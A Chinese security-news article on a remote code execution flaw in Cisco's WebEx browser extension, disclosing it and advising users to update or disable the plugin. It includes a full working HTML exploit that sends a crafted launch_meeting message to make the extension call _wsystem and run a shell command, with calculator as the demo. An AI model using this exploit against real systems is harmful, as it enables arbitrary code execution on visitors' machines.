Cisco的WebEx extension(jlhmfgmfgeifomenelglieieghnjghma)拥有约2,000万活跃用户,并且它也是思科Webex视频会议系统重要的组成部分。
该扩展适用于包含magic模式“cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html”的任何URL,可以从扩展清单中提取。 请注意,该模式内嵌在iframe中,因此不需要用户有更多的交互,只需要访问网站就可以了。
该扩展使用nativeMessaging,所以这个magic字符串可以让任何网站执行任意代码!
这个扩展使用的协议很复杂,使用CustomEvent()对象,在Web页面中和本机代码之间传递JSON消息。
在初始化的过程中,网站使用该扩展发起请求打开一个端口进行通信,如下所示:
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string然后消息可以通过 "message" 事件传递到native code。 注意,这里不能是MessageEvent()对象,并且不能使用postMessage API,它们必须是CustomEvent()对象。
有几种不同的消息类型,例如“hello”,“disconnect”等。最有趣的是“launch_meeting”类型:
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));使用该扩展进行视频会议的过程中,我dump了初始化消息:
> message.message
"{"DocshowVersion": "1.0",
"FilterSecParameters": "clientparam;clientparam_value",
"GpcProductRoot": "WebEx",
"GpcMovingInSubdir": "Wanta",
"GpcProductVersion": "T30_MC",
"GpcUpgradeManagement": "false",
"GpcCompatibleDesktopClients": "",
"enableQuickLaunch": "1",
"GpcProductDescription": "V2ViRXg=",
"GpcUnpackName": "atgpcdec",
"JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog": "1484862376664",
"GpcExtName": "atgpcext",
"GpcUnpackVersion": "27, 17, 2016, 501",
"GpcExtVersion": "3015, 0, 2016, 1117",
"GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcCompressMethod": "7z",
"GpcActiveIniSection": "V2ViRXhfVg==",
"GpcSupportPageUrl": "",
"GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...有大量的属性,很多属性都有可能存在代码执行的问题,下面这些是我挑出来的一些:
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcInitCall": "c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZVZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==",
If we decode those strings, we get:
GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"将这些字符串解码,如下所示:
GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"这看起来像某种奇怪的脚本语言。 'HWND'的存在表明这是与native code交互,如果我dump atmccli.DLL的导出:
$ dumpbin /nologo /exports atmccli.dll
Dump of file atmccli.dll
ordinal hint RVA name
2 2 0001CC11 ExitControl
24 3 0001CC83 FinishCall
1 4 0001D2F9 InitControl <--
23 5 0001D556 NameValue
...看起来像在该脚本语言中调用的函数。 是否可以在这里找一些突破口?
我注意到,他们提供一个CRT(微软的C Runtime,包含像printf,malloc等标准例程)的副本,所以我试图调用标准_wsystem()routime(像system(),除了WCHAR字符串),像这样 :
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}难以置信,居然执行成功了!
完整EXP
<html>
<head>
<title>Cisco WebEx Exploit</title>
<script>
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}
function runcode()
{
if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
return;
}
if (!document.location.protocol.endsWith("https:")) {
alert("document /must/ be served over https");
return;
}
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));
}
</script>
</head>
<body onload="runcode()">
<h1>Running exploit...</h1>
</body>
</html>作者上传了一个测试页面到如下地址,这个地址是安全的,没有其他非法代码执行,仅会弹出一个计算器。
https://lock.cmpxchg8b.com/ieXohz9t/
如果需要测试,你仅需提供姓名、email,不需要注册即可在下面中测试:
https://www.webex.com/test-meeting.html
该漏洞超过90天漏洞公开原则期限,官方尚未提供补丁,故细节得以公开。
安全客建议
更新官方1.0.3版本:
但由于安全社区对该补丁的有效性尚存一定的疑虑,我们建议安装了Webex的用户,(hao)暂(hao)时(guo)禁(nian)用(bie)其(wan)浏(dian)览(nao)器(jiu)插(xing)件。
发表评论
您还未登录,请先登录。
登录